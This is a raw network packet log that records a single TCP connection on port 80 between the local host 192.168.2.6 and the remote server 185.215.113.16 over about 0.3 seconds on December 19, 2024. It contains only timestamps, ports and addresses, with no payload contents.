Dec 19, 2024 10:10:30.703432083 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.705275059 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.705308914 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.705368042 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.706787109 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.706845045 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.706897020 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.706952095 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.708241940 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.708282948 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.708321095 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.708358049 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.709326029 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.709383011 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.709429026 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.709489107 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.710412025 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.710506916 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.710509062 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.710558891 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.711697102 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.711745024 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.711800098 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.713078022 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.713221073 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.713280916 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.714837074 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.714894056 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.714941025 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.714994907 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.716104984 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.716160059 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.716306925 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.716383934 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.717706919 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.717868090 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.717921972 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.719052076 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.719106913 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.719178915 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.719233990 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.720618963 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.720747948 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.720803022 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.720861912 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.722090006 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.722203970 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.722265005 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.723489046 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.723546982 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.786228895 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.786318064 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.786365032 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.786425114 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.786678076 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.786734104 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.786863089 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.786921024 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.786971092 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.787025928 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.787905931 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.787962914 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.788011074 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.788064957 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.789024115 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.789057970 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.789078951 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.789108992 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.789948940 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.790004015 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.790007114 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.790066957 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.790911913 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.790965080 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.791030884 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.791088104 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.791903973 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.792031050 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.792316914 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.792373896 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.793113947 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.793175936 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.793247938 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.793303013 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.794023037 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.794080019 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.794136047 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.794190884 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.795017004 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.795073032 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.795203924 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.795257092 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.796688080 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.796722889 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.796751976 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.796783924 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.798109055 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.798171997 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.798320055 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.798376083 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.800039053 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.800105095 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.800235033 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.800290108 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.801851034 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.801915884 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.802067041 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.802125931 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.803381920 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.803442001 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.803580046 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.803658009 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.804264069 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.804325104 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.804635048 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.804692030 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.805216074 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.805272102 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.805273056 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.805326939 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.806029081 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.806086063 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.806241035 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.806298018 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.807054043 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.807089090 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.807117939 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.807151079 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.808063030 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.808099031 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.808141947 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.808173895 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.808764935 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.808805943 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.808830023 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.808852911 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.809689045 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.809750080 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.809777975 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.809834003 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.810830116 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.810882092 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.810882092 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.810947895 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.811605930 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.811665058 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.811719894 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.811777115 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.812429905 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.812505007 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.812592983 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.813008070 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.813214064 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.813265085 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.813267946 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.813335896 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.814058065 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.814129114 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.814201117 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.814259052 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.815011978 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.815045118 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.815071106 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.815140009 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.815777063 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.815835953 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.816004992 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.816062927 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.816498041 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.816534996 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.816555977 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.816585064 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.817276001 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.817328930 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.817478895 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.818272114 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.818327904 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.818342924 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.818376064 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.818687916 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.818747044 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.818841934 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.818898916 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.819597960 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.819650888 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.819704056 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.820616961 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.820713043 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.820770979 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.821445942 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.821480036 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.821512938 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.821608067 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.821913004 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.821948051 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.822001934 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.822793961 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.822853088 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.822889090 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.822958946 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.823772907 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.823833942 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.823874950 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.823930025 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.824688911 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.824739933 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.824742079 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.824796915 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.825315952 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.825351000 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.825373888 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.825403929 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.826040030 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.826097012 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.826131105 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.826184988 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.826644897 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.826699972 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.826749086 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.826805115 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.827395916 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.827431917 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.827454090 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.827501059 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.828119040 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.828181982 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.828217030 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.828272104 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.828850985 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.828886032 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.828908920 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.828941107 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.829678059 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.829730034 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.829906940 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.829962969 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.830533981 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.830590963 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.830641031 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.830698013 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.831307888 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.831366062 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.831414938 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.831465960 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.831926107 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.831979036 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.832073927 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.832129002 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.832717896 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.832781076 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.832890987 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.832943916 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.833296061 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.833354950 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.833575964 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.833630085 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.834065914 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.834101915 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.834124088 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.834172010 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.978538990 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.978667974 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.978725910 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.978780031 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.978951931 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.979002953 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.979005098 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.979068041 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.979610920 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.979661942 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.979743958 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.979799986 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.980429888 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.980504990 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.980592012 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.980648994 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.981244087 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.981311083 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.981383085 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.981446981 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.982033014 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.982100010 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.982172966 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.982391119 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.982945919 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.982981920 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.983012915 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.983047009 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.983679056 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.983804941 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.983901978 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.983968019 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.984503031 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.984565020 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.984581947 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.984632969 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.984992027 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.985044956 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.985120058 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.985171080 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.985630035 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.985688925 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.985742092 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.985795021 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.986358881 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.986541986 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.986555099 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.986706972 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.986946106 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.986999035 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.987013102 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.987138987 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.987426996 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.987494946 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.987515926 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.987701893 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.988019943 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.988121033 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.988181114 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.988182068 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.988601923 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.988663912 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.988688946 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.988751888 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.989252090 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.989320040 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.989339113 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.989392996 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.989947081 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.990000963 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.990073919 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.990125895 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.990608931 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.990663052 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.990792036 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.990852118 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.991440058 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.991475105 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.991501093 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.991533041 CET	49910	80	192.168.2.6	185.215.113.16
